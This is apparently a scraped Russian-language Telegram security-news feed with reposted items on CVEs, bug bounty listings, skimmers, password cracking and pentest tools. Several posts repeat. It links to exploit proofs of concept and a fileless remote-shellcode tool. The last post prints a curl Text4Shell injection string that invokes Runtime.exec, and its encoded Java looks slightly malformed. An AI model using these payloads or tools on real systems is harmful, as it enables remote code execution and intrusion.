Немного ночного оффтопа и мема.
Nmap — голливудская звезда
Статья - сборник моментов из фильмов, где использовали nmap, прикольно посмотреть. Но ни что не сравниться с
Nmap — голливудская звезда
Статья - сборник моментов из фильмов, где использовали nmap, прикольно посмотреть. Но ни что не сравниться с
шзсщташп в российских сериалах :)#Windows
Golden Ticket: разбираем атаку и методы ее детекта
Сегодня мы хотим поговорить об атаке с применением известной техники Golden Ticket (T1558.001). О том, что лежит в основе Golden Ticket атак и какие механизмы их реализации существуют, написано уже много. Поэтому в этой статье мы сфокусируемся больше на способах детектирования подобных угроз.
Golden Ticket: разбираем атаку и методы ее детекта
Сегодня мы хотим поговорить об атаке с применением известной техники Golden Ticket (T1558.001). О том, что лежит в основе Golden Ticket атак и какие механизмы их реализации существуют, написано уже много. Поэтому в этой статье мы сфокусируемся больше на способах детектирования подобных угроз.
Forwarded from Информация опасносте
This media is not supported in your browser
VIEW IN TELEGRAM
по мотивам парочки последних нашумевших взломов
🤣3👍1
#BugBounty
Mastering the Skills of Bug Bounty
Bug bounties are a great way to gain experience in cybersecurity and earn some extra bucks. I’m a huge proponent for participating in bug bounties as your way into the cybersecurity industry.
Mastering the Skills of Bug Bounty
Bug bounties are a great way to gain experience in cybersecurity and earn some extra bucks. I’m a huge proponent for participating in bug bounties as your way into the cybersecurity industry.
Forwarded from RESOLUTE ATTACK
Сегодня поговорим немного об актуальных уязвимостях системы, а именно CVE-2021-4034 aka Pwnkit
CORS | E7PENTEST SUBSCRIBETelegraph
Актуальные уязвимости. CVE-2021-4034 aka Pwnkit.
CVE-2021-4034 - (в просторечии называемая «Pwnkit») — это ужасающая уязвимость, связанная с локальным повышением привилегий (Local Privilege Escalation), расположенная в пакете «Polkit», установленном по умолчанию почти во всех основных дистрибутивах операционной…
❤3
#BugBounty
Привет, подписчики!
На The Standoff 365 Bug Bounty появилось 4 новых программы от 1 компании.
Пульс — до 180 000 ₽
DonationAlerts — до 600 000 ₽
Boosty — до 180 000 ₽
Tarantool — До 60 000 ₽
Привет, подписчики!
На The Standoff 365 Bug Bounty появилось 4 новых программы от 1 компании.
Пульс — до 180 000 ₽
DonationAlerts — до 600 000 ₽
Boosty — до 180 000 ₽
Tarantool — До 60 000 ₽
Forwarded from Monkey Hacker
#cve
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
GitHub
GitHub - carlosevieira/CVE-2022-40684: PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only) - carlosevieira/CVE-2022-40684
Forwarded from RESOLUTE ATTACK
CVE-2022-22965 aka Spring4Shell
В конце марта 2022 года была обнародована уязвимость удаленного выполнения команд (RCE) в Java Spring Framework. Уязвимость позволяет загрузить вебшелл на уязвимый сервер, добиваясь удаленного выполнения команд.
Подробнее
#Уязвимость #CVE
В конце марта 2022 года была обнародована уязвимость удаленного выполнения команд (RCE) в Java Spring Framework. Уязвимость позволяет загрузить вебшелл на уязвимый сервер, добиваясь удаленного выполнения команд.
Подробнее
#Уязвимость #CVE
CORS | E7 SUBSCRIBETelegraph
CVE-2022-22965 aka Spring4Shell
В конце марта 2022 года была обнародована уязвимость удаленного выполнения команд (RCE) в Java Spring Framework. Уязвимость позволяет загрузить вебшелл на уязвимый сервер, добиваясь удаленного выполнения команд. Как работает? Большинство эксплойтов для уязвимости…
#BugBounty
Привет, подписчики!
На The Standoff 365 Bug Bounty появилось 2 новые программы от 1 компании.
My Target — до 180 000 ₽
Чемпионаты VK — до 60 000 ₽
Привет, подписчики!
На The Standoff 365 Bug Bounty появилось 2 новые программы от 1 компании.
My Target — до 180 000 ₽
Чемпионаты VK — до 60 000 ₽
👍3
Forwarded from RESOLUTE ATTACK
This media is not supported in your browser
VIEW IN TELEGRAM
Запуск безфайлового удаленного шеллкода непосредственно в памяти с отсоединением модуля, остановкой модуля, отсутствием нового потока.
Этот репозиторий содержит
TeamServer и Stager
https://github.com/D1rkMtr/FileLessRemoteShellcode
Tadn3wb | E7SUBCRIBE
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 0•Bytes•1
All_5G.zip
26.5 MB
Статьи про атаки , угрозы , меры безопасности и подробную работу 5G , надеюсь вам будет полезно ❤️✨
Articles about attacks, threats, security measures and detailed operation of 5G, I hope you will find useful ✨❤️
#5g #network #mobile #attacks #protection
Articles about attacks, threats, security measures and detailed operation of 5G, I hope you will find useful ✨❤️
#5g #network #mobile #attacks #protection
Forwarded from T.Hunter
#news Не одним лишь фишингом данных с кредиток единым: скиммеры по-прежнему в деле и эволюционируют. На скрине новинка 2022-го на этом сомнительном поприще. Сканер толщиной в полмилиметра занимает слот для карточки и не мешает его работе. А камеры для записи пин-кода прячут в боковых и зеркальных панелях.
Банки в ответ ставят в слоты заглушки и камеры для распознавания скиммеров. Но они так и будут в ходу, пока есть нужда в обратной совместимости и нет повсеместного бесконтакта. И одинокий банкомат в тёмном переулке субботним вечером может оказаться с неприятным сюрпризом.
@tomhunter
Банки в ответ ставят в слоты заглушки и камеры для распознавания скиммеров. Но они так и будут в ходу, пока есть нужда в обратной совместимости и нет повсеместного бесконтакта. И одинокий банкомат в тёмном переулке субботним вечером может оказаться с неприятным сюрпризом.
@tomhunter
Forwarded from NETRUNNER GROUP (Сергей Зыбнев)
#ЦиклСтатей_HTB
Writeup HackTheBox Shoppy [EASY]
Доброго времени суток, сегодня мы разберем машину Shoppy на Hack The Box из категории Easy.
Writeup HackTheBox Shoppy [EASY]
Доброго времени суток, сегодня мы разберем машину Shoppy на Hack The Box из категории Easy.
Telegraph
Writeup shoppy.htb [EASY]
Сканирование Для начала закинем машинку в /etc/hosts. Посмотрим на сервисы, запущенные на машине: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.23.1 Посканим на возможные поддомены утилитой…
Forwarded from RESOLUTE ATTACK
🔥Инвентарь инструментов киберсека от Rawsec
Ссылка - https://inventory.raw.pm/tools.html
Ссылка - https://inventory.raw.pm/tools.html
Tadn3wb | E7 SUBCRIBEForwarded from IT CHEF: Новости, кибербезопасность
Не только для игр: восемь GeForce RTX 4090 вскрывают 8-значный пароль за 48 минут
GeForce RTX 4090 – стойка из восьми видеокарт, которая позволяет взломать восьмизначный пароль менее чем за час. О новинке рассказал ИБ-специалист Сэма Кроули, который выложил в своем Twitter результаты тестов по взлому паролей, проведенных на стойке.
Видеокарта отлично справляется даже с протоколом аутентификации Microsoft New Technology LAN Manager (NTLM) и Bcrypt. Все взломанные с помощью RTX 4090 пароли соответствовали актуальным методам безопасности и состояли из букв в случайном регистре, символов и цифр.
Для проведения тестов использовали HashCat V.6.2.6. Во всех типах атак, предусмотренных HashCat, видеокарта оказалась почти вдвое эффективнее RTX 3090.
#интересно
GeForce RTX 4090 – стойка из восьми видеокарт, которая позволяет взломать восьмизначный пароль менее чем за час. О новинке рассказал ИБ-специалист Сэма Кроули, который выложил в своем Twitter результаты тестов по взлому паролей, проведенных на стойке.
Видеокарта отлично справляется даже с протоколом аутентификации Microsoft New Technology LAN Manager (NTLM) и Bcrypt. Все взломанные с помощью RTX 4090 пароли соответствовали актуальным методам безопасности и состояли из букв в случайном регистре, символов и цифр.
Для проведения тестов использовали HashCat V.6.2.6. Во всех типах атак, предусмотренных HashCat, видеокарта оказалась почти вдвое эффективнее RTX 3090.
#интересно
👍2
#Tools
Сегодня я вам расскажу про комплексный инструмент для Wi-Fi пентеста. Он имеет довольно широкий функицонал
SniffAir – фреймворк для проведения пентеста Wi-Fi
Сегодня я вам расскажу про комплексный инструмент для Wi-Fi пентеста. Он имеет довольно широкий функицонал
SniffAir – фреймворк для проведения пентеста Wi-Fi
Telegraph
SniffAir – фреймворк для проведения пентеста Wi-Fi
SniffAir – это инфраструктура безопасности с открытым исходным кодом, которая позволяет легко анализировать пассивно собранные данные о беспроводных сетях, а также запускать сложные беспроводные атаки. https://github.com/Tylous/SniffAir SniffAir заботится…
❤1
#CVE #POC
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
Text4Shell CVE-2022-42889
CVE-2022-42889 Text4Shell affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10.
POC:
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D